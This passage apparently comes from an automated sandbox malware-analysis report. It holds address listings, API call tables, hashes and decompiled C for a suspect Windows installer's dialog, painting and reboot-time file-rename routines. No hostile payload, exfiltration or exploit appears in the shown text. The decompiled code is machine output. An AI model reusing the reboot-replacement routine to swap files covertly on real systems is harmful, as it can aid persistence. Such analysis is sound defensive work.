                                  0x00404f39
                                  0x00404f4f
                                  0x00404f52
                                  0x0040517d
                                  0x00405184
                                  0x00405198
                                  0x00405186
                                  0x00405188
                                  0x0040518b
                                  0x0040518c
                                  0x00405193
                                  0x00405193
                                  0x004051a4
                                  0x004051b2
                                  0x004051b5
                                  0x004051cb
                                  0x00405240
                                  0x00405243
                                  0x00405245
                                  0x0040524f
                                  0x0040525d
                                  0x0040525d
                                  0x0040525f
                                  0x00405269
                                  0x0040526f
                                  0x00405272
                                  0x00405275
                                  0x00405290
                                  0x00405277
                                  0x00405281
                                  0x00405281
                                  0x00405275
                                  0x00405269
                                  0x00000000
                                  0x00405243
                                  0x004051d0
                                  0x004051db
                                  0x004051e0
                                  0x004051e7
                                  0x004051ec
                                  0x004051f0
                                  0x004051fb
                                  0x004051fb
                                  0x004051ff
                                  0x00405203
                                  0x00405207
                                  0x0040521a
                                  0x00405209
                                  0x00405209
                                  0x00405210
                                  0x00405216
                                  0x00405212
                                  0x00405212
                                  0x00405212
                                  0x00405210
                                  0x0040521e
                                  0x00405220
                                  0x00405233
                                  0x00405236
                                  0x00405239
                                  0x00405239
                                  0x00405203
                                  0x00000000
                                  0x004051f0
                                  0x004051d2
                                  0x004051d9
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00405293
                                  0x00405293
                                  0x0040529a
                                  0x0040530b
                                  0x00405313
                                  0x0040531b
                                  0x0040531b
                                  0x00405324
                                  0x00405326
                                  0x0040532d
                                  0x00405330
                                  0x00405330
                                  0x00405336
                                  0x0040533d
                                  0x00405340
                                  0x00405340
                                  0x00405346
                                  0x0040534c
                                  0x00405352
                                  0x00405352
                                  0x0040535f
                                  0x004054c0
                                  0x004054c7
                                  0x004054e4
                                  0x004054ea
                                  0x004054fc
                                  0x004054fc
                                  0x00000000
                                  0x00405365
                                  0x00405367
                                  0x0040536c
                                  0x00405371
                                  0x00405376
                                  0x00405378
                                  0x00405378
                                  0x00405379
                                  0x0040537a
                                  0x0040537c
                                  0x0040537c
                                  0x00405384
                                  0x004053c5
                                  0x004053c7
                                  0x004053d7
                                  0x004053da
                                  0x004053df
                                  0x004053e6
                                  0x004053e9
                                  0x0040548b
                                  0x00405494
                                  0x0040549c
                                  0x0040549c
                                  0x004054a2
                                  0x004054aa
                                  0x004054bb
                                  0x004054bb
                                  0x00000000
                                  0x004054aa
                                  0x004053ef
                                  0x004053f2
                                  0x004053f8
                                  0x004053fd
                                  0x004053ff
                                  0x00405401
                                  0x00405407
                                  0x0040540e
                                  0x00405413
                                  0x0040541a
                                  0x0040541d
                                  0x0040541d
                                  0x00405424
                                  0x00405430
                                  0x00405434
                                  0x00405436
                                  0x00405436
                                  0x00405426
                                  0x00405428
                                  0x00405428
                                  0x00405456
                                  0x00405462
                                  0x00405471
                                  0x00405471
                                  0x00405473
                                  0x00405476
                                  0x0040547f
                                  0x00000000
                                  0x00405386
                                  0x00405391
                                  0x00405394
                                  0x00405399
                                  0x0040539b
                                  0x0040539f
                                  0x004053af
                                  0x004053b9
                                  0x004053bb
                                  0x004053be
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x004053a1
                                  0x004053a1
                                  0x004053a7
                                  0x004053a9
                                  0x004053a9
                                  0x004053aa
                                  0x004053ab
                                  0x00000000
                                  0x004053a1
                                  0x00405384
                                  0x0040535f
                                  0x004052a2
                                  0x00000000
                                  0x004052b8
                                  0x004052c2
                                  0x004052c7
                                  0x00000000
                                  0x00000000
                                  0x004052d9
                                  0x004052de
                                  0x004052ea
                                  0x004052ea
                                  0x004052ec
                                  0x004052fb
                                  0x004052fd
                                  0x00405301
                                  0x00405304
                                  0x00000000
                                  0x00405304
                                  0x004052a2
                                  0x00404f58
                                  0x00404f5d
                                  0x00404f66
                                  0x00404f6d
                                  0x00404f7f
                                  0x00404f8a
                                  0x00404f90
                                  0x00404f9e
                                  0x00404fb2
                                  0x00404fb7
                                  0x00404fc4
                                  0x00404fc9
                                  0x00404fdf
                                  0x00404ff0
                                  0x00404ffd
                                  0x00404ffd
                                  0x00405000
                                  0x00405006
                                  0x00405008
                                  0x0040500b
                                  0x00405010
                                  0x00405015
                                  0x00405017
                                  0x00405017
                                  0x00405037
                                  0x00405037
                                  0x00405039
                                  0x0040503a
                                  0x0040503f
                                  0x00405045
                                  0x00405049
                                  0x0040504e
                                  0x00405056
                                  0x0040505a
                                  0x0040505f
                                  0x00405064
                                  0x0040506c
                                  0x0040506f
                                  0x0040513f
                                  0x00405152
                                  0x00000000
                                  0x00405075
                                  0x00405078
                                  0x0040507b
                                  0x0040507e
                                  0x0040507e
                                  0x00405084
                                  0x0040508d
                                  0x00405090
                                  0x00405094
                                  0x00405097
                                  0x0040509a
                                  0x004050a3
                                  0x004050ac
                                  0x004050af
                                  0x004050b2
                                  0x004050b5
                                  0x004050f3
                                  0x0040511e
                                  0x004050f5
                                  0x00405104
                                  0x00405104
                                  0x004050b7
                                  0x004050ba
                                  0x004050c8
                                  0x004050d2
                                  0x004050da
                                  0x004050e1
                                  0x004050ec
                                  0x004050ec
                                  0x004050b5
                                  0x00405124
                                  0x00405125
                                  0x00405131
                                  0x00405131
                                  0x0040513d
                                  0x00405158
                                  0x0040515b
                                  0x00405178
                                  0x00000000
                                  0x0040515d
                                  0x00405162
                                  0x0040516b
                                  0x004054fe
                                  0x00405510
                                  0x00405510
                                  0x0040515b
                                  0x00000000
                                  0x0040513d
                                  0x0040506f

                                  APIs
                                  • GetDlgItem.USER32 ref: 00404F1E
                                  • GetDlgItem.USER32 ref: 00404F29
                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 00404F73
                                  • LoadImageW.USER32 ref: 00404F8A
                                  • SetWindowLongW.USER32(?,000000FC,00405513), ref: 00404FA3
                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404FB7
                                  • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404FC9
                                  • SendMessageW.USER32(?,00001109,00000002), ref: 00404FDF
                                  • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404FEB
                                  • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404FFD
                                  • DeleteObject.GDI32(00000000), ref: 00405000
                                  • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 0040502B
                                  • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405037
                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 004050D2
                                  • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00405102
                                    • Part of subcall function 004044CE: SendMessageW.USER32(00000028,?,00000001,004042F9), ref: 004044DC
                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 00405116
                                  • GetWindowLongW.USER32(?,000000F0), ref: 00405144
                                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00405152
                                  • ShowWindow.USER32(?,00000005), ref: 00405162
                                  • SendMessageW.USER32(?,00000419,00000000,?), ref: 0040525D
                                  • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004052C2
                                  • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 004052D7
                                  • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004052FB
                                  • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 0040531B
                                  • ImageList_Destroy.COMCTL32(?), ref: 00405330
                                  • GlobalFree.KERNEL32 ref: 00405340
                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004053B9
                                  • SendMessageW.USER32(?,00001102,?,?), ref: 00405462
                                  • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405471
                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 0040549C
                                  • ShowWindow.USER32(?,00000000), ref: 004054EA
                                  • GetDlgItem.USER32 ref: 004054F5
                                  • ShowWindow.USER32(00000000), ref: 004054FC
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.777947969.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.777940223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777964906.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777971054.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777977082.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778005953.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778015938.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778022993.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778039326.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778046146.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                  Similarity
                                  • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                  • String ID: $M$N
                                  • API String ID: 2564846305-813528018
                                  • Opcode ID: 749bdf8e43bd841ecb3e5c95033ce80d775c45143b483fe0b3b59f6494973967
                                  • Instruction ID: 669472b6e39b4296dbb294a81ed98d86f32f22d8abeb4cff7518c6a892085abf
                                  • Opcode Fuzzy Hash: 749bdf8e43bd841ecb3e5c95033ce80d775c45143b483fe0b3b59f6494973967
                                  • Instruction Fuzzy Hash: EF028A70900608EFDB20DFA9DD45AAF7BB5FB84314F10817AE610BA2E0D7799942DF58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 92%
                                  			E00404658(struct HWND__* _a4, int _a8, unsigned int _a12, WCHAR* _a16) {
                                  				intOrPtr _v8;
                                  				int _v12;
                                  				void* _v16;
                                  				struct HWND__* _t56;
                                  				intOrPtr _t69;
                                  				signed int _t75;
                                  				signed short* _t76;
                                  				signed short* _t78;
                                  				long _t92;
                                  				int _t103;
                                  				signed int _t110;
                                  				intOrPtr _t111;
                                  				intOrPtr _t113;
                                  				WCHAR* _t114;
                                  				signed int* _t116;
                                  				WCHAR* _t117;
                                  				struct HWND__* _t118;
                                  
                                  				if(_a8 != 0x110) {
                                  					if(_a8 != 0x111) {
                                  						L13:
                                  						if(_a8 != 0x4e) {
                                  							if(_a8 == 0x40b) {
                                  								 *0x42b234 =  *0x42b234 + 1;
                                  							}
                                  							L27:
                                  							_t114 = _a16;
                                  							L28:
                                  							return E00404500(_a8, _a12, _t114);
                                  						}
                                  						_t56 = GetDlgItem(_a4, 0x3e8);
                                  						_t114 = _a16;
                                  						if( *((intOrPtr*)(_t114 + 8)) == 0x70b &&  *((intOrPtr*)(_t114 + 0xc)) == 0x201) {
                                  							_t103 =  *((intOrPtr*)(_t114 + 0x1c));
                                  							_t113 =  *((intOrPtr*)(_t114 + 0x18));
                                  							_v12 = _t103;
                                  							_v16 = _t113;
                                  							_v8 = 0x432ea0;
                                  							if(_t103 - _t113 < 0x800) {
                                  								SendMessageW(_t56, 0x44b, 0,  &_v16);
                                  								SetCursor(LoadCursorW(0, 0x7f02));
                                  								_push(1);
                                  								E00404907(_a4, _v8);
                                  								SetCursor(LoadCursorW(0, 0x7f00));
                                  								_t114 = _a16;
                                  							}
                                  						}
                                  						if( *((intOrPtr*)(_t114 + 8)) != 0x700 ||  *((intOrPtr*)(_t114 + 0xc)) != 0x100) {
                                  							goto L28;
                                  						} else {
                                  							if( *((intOrPtr*)(_t114 + 0x10)) == 0xd) {
                                  								SendMessageW( *0x434f08, 0x111, 1, 0);
                                  							}
                                  							if( *((intOrPtr*)(_t114 + 0x10)) == 0x1b) {
                                  								SendMessageW( *0x434f08, 0x10, 0, 0);
                                  							}
                                  							return 1;
                                  						}
                                  					}
                                  					if(_a12 >> 0x10 != 0 ||  *0x42b234 != 0) {
                                  						goto L27;
                                  					} else {
                                  						_t69 =  *0x42c240; // 0x80bf74
                                  						_t29 = _t69 + 0x14; // 0x80bf88
                                  						_t116 = _t29;
                                  						if(( *_t116 & 0x00000020) == 0) {
                                  							goto L27;
                                  						}
                                  						 *_t116 =  *_t116 & 0xfffffffe | SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
                                  						E004044BB(SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
                                  						E004048E3();
                                  						goto L13;
                                  					}
                                  				}
                                  				_t117 = _a16;
                                  				_t75 =  *(_t117 + 0x30);
                                  				if(_t75 < 0) {
                                  					_t111 =  *0x433edc; // 0x81267e
                                  					_t75 =  *(_t111 - 4 + _t75 * 4);
                                  				}
                                  				_t76 =  *0x434f38 + _t75 * 2;
                                  				_t110 =  *_t76 & 0x0000ffff;
                                  				_a8 = _t110;
                                  				_t78 =  &(_t76[1]);
                                  				_a16 = _t78;
                                  				_v16 = _t78;
                                  				_v12 = 0;
                                  				_v8 = E00404609;
                                  				if(_t110 != 2) {
                                  					_v8 = E004045CF;
                                  				}
                                  				_push( *((intOrPtr*)(_t117 + 0x34)));
                                  				_push(0x22);
                                  				E00404499(_a4);
                                  				_push( *((intOrPtr*)(_t117 + 0x38)));
                                  				_push(0x23);
                                  				E00404499(_a4);
                                  				CheckDlgButton(_a4, (0 | ( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
                                  				E004044BB( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001);
                                  				_t118 = GetDlgItem(_a4, 0x3e8);
                                  				E004044CE(_t118);
                                  				SendMessageW(_t118, 0x45b, 1, 0);
                                  				_t92 =  *( *0x434f10 + 0x68);
                                  				if(_t92 < 0) {
                                  					_t92 = GetSysColor( ~_t92);
                                  				}
                                  				SendMessageW(_t118, 0x443, 0, _t92);
                                  				SendMessageW(_t118, 0x445, 0, 0x4010000);
                                  				SendMessageW(_t118, 0x435, 0, lstrlenW(_a16));
                                  				 *0x42b234 = 0;
                                  				SendMessageW(_t118, 0x449, _a8,  &_v16);
                                  				 *0x42b234 = 0;
                                  				return 0;
                                  			}




















                                  0x0040466a
                                  0x00404797
                                  0x004047f4
                                  0x004047f8
                                  0x004048c5
                                  0x004048c7
                                  0x004048c7
                                  0x004048cd
                                  0x004048cd
                                  0x004048d0
                                  0x00000000
                                  0x004048d7
                                  0x00404806
                                  0x0040480c
                                  0x00404816
                                  0x00404821
                                  0x00404824
                                  0x00404827
                                  0x00404832
                                  0x00404835
                                  0x0040483c
                                  0x00404849
                                  0x0040485a
                                  0x00404860
                                  0x00404868
                                  0x00404876
                                  0x0040487c
                                  0x0040487c
                                  0x0040483c
                                  0x00404886
                                  0x00000000
                                  0x00404891
                                  0x00404895
                                  0x004048a5
                                  0x004048a5
                                  0x004048ab
                                  0x004048b7
                                  0x004048b7
                                  0x00000000
                                  0x004048bb
                                  0x00404886
                                  0x004047a2
                                  0x00000000
                                  0x004047b4
                                  0x004047b4
                                  0x004047b9
                                  0x004047b9
                                  0x004047bf
                                  0x00000000
                                  0x00000000
                                  0x004047e8
                                  0x004047ea
                                  0x004047ef
                                  0x00000000
                                  0x004047ef
                                  0x004047a2
                                  0x00404670
                                  0x00404673
                                  0x00404678
                                  0x0040467a
                                  0x00404689
                                  0x00404689
                                  0x00404691
                                  0x00404694
                                  0x00404698
                                  0x0040469b
                                  0x0040469f
                                  0x004046a2
                                  0x004046a5
                                  0x004046a8
                                  0x004046af
                                  0x004046b1
                                  0x004046b1
                                  0x004046bb
                                  0x004046c8
                                  0x004046d2
                                  0x004046d7
                                  0x004046da
                                  0x004046df
                                  0x004046f6
                                  0x004046fd
                                  0x00404710
                                  0x00404713
                                  0x00404727
                                  0x0040472e
                                  0x00404733
                                  0x00404738
                                  0x00404738
                                  0x00404746
                                  0x00404754
                                  0x00404766
                                  0x0040476b
                                  0x0040477b
                                  0x0040477d
                                  0x00000000

                                  APIs
                                  • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004046F6
                                  • GetDlgItem.USER32 ref: 0040470A
                                  • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404727
                                  • GetSysColor.USER32(?), ref: 00404738
                                  • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404746
                                  • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00404754
                                  • lstrlenW.KERNEL32(?), ref: 00404759
                                  • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404766
                                  • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040477B
                                  • GetDlgItem.USER32 ref: 004047D4
                                  • SendMessageW.USER32(00000000), ref: 004047DB
                                  • GetDlgItem.USER32 ref: 00404806
                                  • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404849
                                  • LoadCursorW.USER32(00000000,00007F02), ref: 00404857
                                  • SetCursor.USER32(00000000), ref: 0040485A
                                  • LoadCursorW.USER32(00000000,00007F00), ref: 00404873
                                  • SetCursor.USER32(00000000), ref: 00404876
                                  • SendMessageW.USER32(00000111,00000001,00000000), ref: 004048A5
                                  • SendMessageW.USER32(00000010,00000000,00000000), ref: 004048B7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.777947969.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.777940223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777964906.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777971054.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777977082.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778005953.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778015938.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778022993.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778039326.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778046146.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                  Similarity
                                  • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                  • String ID: Call$N
                                  • API String ID: 3103080414-3438112850
                                  • Opcode ID: ce357ac6e0fd4f2b4f67e04795876aef6a46bd5fea1783cb4cf669a44dc9f0f8
                                  • Instruction ID: e0aa441e67ff77812dea5cfa76c138b5706349c0d06c8e95e02877fce1cb63d1
                                  • Opcode Fuzzy Hash: ce357ac6e0fd4f2b4f67e04795876aef6a46bd5fea1783cb4cf669a44dc9f0f8
                                  • Instruction Fuzzy Hash: 1A61A3B5900209BFDB10AF60DD85E6A7BA9FB44314F00843AFB05B62D0D778A951DF98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 90%
                                  			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
                                  				struct tagLOGBRUSH _v16;
                                  				struct tagRECT _v32;
                                  				struct tagPAINTSTRUCT _v96;
                                  				struct HDC__* _t70;
                                  				struct HBRUSH__* _t87;
                                  				struct HFONT__* _t94;
                                  				long _t102;
                                  				signed int _t126;
                                  				struct HDC__* _t128;
                                  				intOrPtr _t130;
                                  
                                  				if(_a8 == 0xf) {
                                  					_t130 =  *0x434f10;
                                  					_t70 = BeginPaint(_a4,  &_v96);
                                  					_v16.lbStyle = _v16.lbStyle & 0x00000000;
                                  					_a8 = _t70;
                                  					GetClientRect(_a4,  &_v32);
                                  					_t126 = _v32.bottom;
                                  					_v32.bottom = _v32.bottom & 0x00000000;
                                  					while(_v32.top < _t126) {
                                  						_a12 = _t126 - _v32.top;
                                  						asm("cdq");
                                  						asm("cdq");
                                  						asm("cdq");
                                  						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
                                  						_t87 = CreateBrushIndirect( &_v16);
                                  						_v32.bottom = _v32.bottom + 4;
                                  						_a16 = _t87;
                                  						FillRect(_a8,  &_v32, _t87);
                                  						DeleteObject(_a16);
                                  						_v32.top = _v32.top + 4;
                                  					}
                                  					if( *(_t130 + 0x58) != 0xffffffff) {
                                  						_t94 = CreateFontIndirectW( *(_t130 + 0x34));
                                  						_a16 = _t94;
                                  						if(_t94 != 0) {
                                  							_t128 = _a8;
                                  							_v32.left = 0x10;
                                  							_v32.top = 8;
                                  							SetBkMode(_t128, 1);
                                  							SetTextColor(_t128,  *(_t130 + 0x58));
                                  							_a8 = SelectObject(_t128, _a16);
                                  							DrawTextW(_t128, 0x433f00, 0xffffffff,  &_v32, 0x820);
                                  							SelectObject(_t128, _a8);
                                  							DeleteObject(_a16);
                                  						}
                                  					}
                                  					EndPaint(_a4,  &_v96);
                                  					return 0;
                                  				}
                                  				_t102 = _a16;
                                  				if(_a8 == 0x46) {
                                  					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
                                  					 *((intOrPtr*)(_t102 + 4)) =  *0x434f08;
                                  				}
                                  				return DefWindowProcW(_a4, _a8, _a12, _t102);
                                  			}













                                  0x0040100a
                                  0x00401039
                                  0x00401047
                                  0x0040104d
                                  0x00401051
                                  0x0040105b
                                  0x00401061
                                  0x00401064
                                  0x004010f3
                                  0x00401089
                                  0x0040108c
                                  0x004010a6
                                  0x004010bd
                                  0x004010cc
                                  0x004010cf
                                  0x004010d5
                                  0x004010d9
                                  0x004010e4
                                  0x004010ed
                                  0x004010ef
                                  0x004010ef
                                  0x00401100
                                  0x00401105
                                  0x0040110d
                                  0x00401110
                                  0x00401112
                                  0x00401118
                                  0x0040111f
                                  0x00401126
                                  0x00401130
                                  0x00401142
                                  0x00401156
                                  0x00401160
                                  0x00401165
                                  0x00401165
                                  0x00401110
                                  0x0040116e
                                  0x00000000
                                  0x00401178
                                  0x00401010
                                  0x00401013
                                  0x00401015
                                  0x0040101f
                                  0x0040101f
                                  0x00000000

                                  APIs
                                  • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                  • BeginPaint.USER32(?,?), ref: 00401047
                                  • GetClientRect.USER32(?,?), ref: 0040105B
                                  • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                  • FillRect.USER32 ref: 004010E4
                                  • DeleteObject.GDI32(?), ref: 004010ED
                                  • CreateFontIndirectW.GDI32(?), ref: 00401105
                                  • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                  • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                  • SelectObject.GDI32(00000000,?), ref: 00401140
                                  • DrawTextW.USER32(00000000,00433F00,000000FF,00000010,00000820), ref: 00401156
                                  • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                  • DeleteObject.GDI32(?), ref: 00401165
                                  • EndPaint.USER32(?,?), ref: 0040116E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.777947969.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.777940223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777964906.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777971054.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777977082.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778005953.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778015938.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778022993.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778039326.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778046146.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                  Similarity
                                  • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                  • String ID: F
                                  • API String ID: 941294808-1304234792
                                  • Opcode ID: 15a6b7738402934ac822911e252168026e8f0364f08849f6e110b85e8bc9718e
                                  • Instruction ID: e457e53e67a16f607b198c8be77aa7e47a8fd9e6aa67a1a07366d16d1d2d9a76
                                  • Opcode Fuzzy Hash: 15a6b7738402934ac822911e252168026e8f0364f08849f6e110b85e8bc9718e
                                  • Instruction Fuzzy Hash: 0E418B71800209AFCF058FA5DE459AF7FB9FF44315F04802AF991AA1A0C738AA55DFA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00406183(void* __ecx) {
                                  				void* __ebx;
                                  				void* __edi;
                                  				void* __esi;
                                  				long _t12;
                                  				long _t24;
                                  				char* _t31;
                                  				int _t37;
                                  				void* _t38;
                                  				intOrPtr* _t39;
                                  				long _t42;
                                  				WCHAR* _t44;
                                  				void* _t46;
                                  				void* _t48;
                                  				void* _t49;
                                  				void* _t52;
                                  				void* _t53;
                                  
                                  				_t38 = __ecx;
                                  				_t44 =  *(_t52 + 0x14);
                                  				 *0x430908 = 0x55004e;
                                  				 *0x43090c = 0x4c;
                                  				if(_t44 == 0) {
                                  					L3:
                                  					_t12 = GetShortPathNameW( *(_t52 + 0x1c), 0x431108, 0x400);
                                  					if(_t12 != 0 && _t12 <= 0x400) {
                                  						_t37 = wsprintfA(0x430508, "%ls=%ls\r\n", 0x430908, 0x431108);
                                  						_t53 = _t52 + 0x10;
                                  						E0040657A(_t37, 0x400, 0x431108, 0x431108,  *((intOrPtr*)( *0x434f10 + 0x128)));
                                  						_t12 = E0040602D(0x431108, 0xc0000000, 4);
                                  						_t48 = _t12;
                                  						 *(_t53 + 0x18) = _t48;
                                  						if(_t48 != 0xffffffff) {
                                  							_t42 = GetFileSize(_t48, 0);
                                  							_t6 = _t37 + 0xa; // 0xa
                                  							_t46 = GlobalAlloc(0x40, _t42 + _t6);
                                  							if(_t46 == 0 || E004060B0(_t48, _t46, _t42) == 0) {
                                  								L18:
                                  								return CloseHandle(_t48);
                                  							} else {
                                  								if(E00405F92(_t38, _t46, "[Rename]\r\n") != 0) {
                                  									_t49 = E00405F92(_t38, _t21 + 0xa, "\n[");
                                  									if(_t49 == 0) {
                                  										_t48 =  *(_t53 + 0x18);
                                  										L16:
                                  										_t24 = _t42;
                                  										L17:
                                  										E00405FE8(_t24 + _t46, 0x430508, _t37);
                                  										SetFilePointer(_t48, 0, 0, 0);
                                  										E004060DF(_t48, _t46, _t42 + _t37);
                                  										GlobalFree(_t46);
                                  										goto L18;
                                  									}
                                  									_t39 = _t46 + _t42;
                                  									_t31 = _t39 + _t37;
                                  									while(_t39 > _t49) {
                                  										 *_t31 =  *_t39;
                                  										_t31 = _t31 - 1;
                                  										_t39 = _t39 - 1;
                                  									}
                                  									_t24 = _t49 - _t46 + 1;
                                  									_t48 =  *(_t53 + 0x18);
                                  									goto L17;
                                  								}
                                  								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
                                  								_t42 = _t42 + 0xa;
                                  								goto L16;
                                  							}
                                  						}
                                  					}
                                  				} else {
                                  					CloseHandle(E0040602D(_t44, 0, 1));
                                  					_t12 = GetShortPathNameW(_t44, 0x430908, 0x400);
                                  					if(_t12 != 0 && _t12 <= 0x400) {
                                  						goto L3;
                                  					}
                                  				}
                                  				return _t12;
                                  			}



















                                  0x00406183
                                  0x0040618c
                                  0x00406193
                                  0x0040619d
                                  0x004061b1
                                  0x004061d9
                                  0x004061e4
                                  0x004061e8
                                  0x00406208
                                  0x0040620f
                                  0x00406219
                                  0x00406226
                                  0x0040622b
                                  0x00406230
                                  0x00406234
                                  0x00406243
                                  0x00406245
                                  0x00406252
                                  0x00406256
                                  0x004062f1
                                  0x00000000
                                  0x0040626c
                                  0x00406279
                                  0x0040629d
                                  0x004062a1
                                  0x004062c0
                                  0x004062c4
                                  0x004062c4
                                  0x004062c6
                                  0x004062cf
                                  0x004062da
                                  0x004062e5
                                  0x004062eb
                                  0x00000000
                                  0x004062eb
                                  0x004062a3
                                  0x004062a6
                                  0x004062b1
                                  0x004062ad
                                  0x004062af
                                  0x004062b0
                                  0x004062b0
                                  0x004062b8
                                  0x004062ba
                                  0x00000000
                                  0x004062ba
                                  0x00406284
                                  0x0040628a
                                  0x00000000
                                  0x0040628a
                                  0x00406256
                                  0x00406234
                                  0x004061b3
                                  0x004061be
                                  0x004061c7
                                  0x004061cb
                                  0x00000000
                                  0x00000000
                                  0x004061cb
                                  0x004062fc

                                  APIs
                                  • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,0040631E,?,?), ref: 004061BE
                                  • GetShortPathNameW.KERNEL32 ref: 004061C7
                                    • Part of subcall function 00405F92: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA2
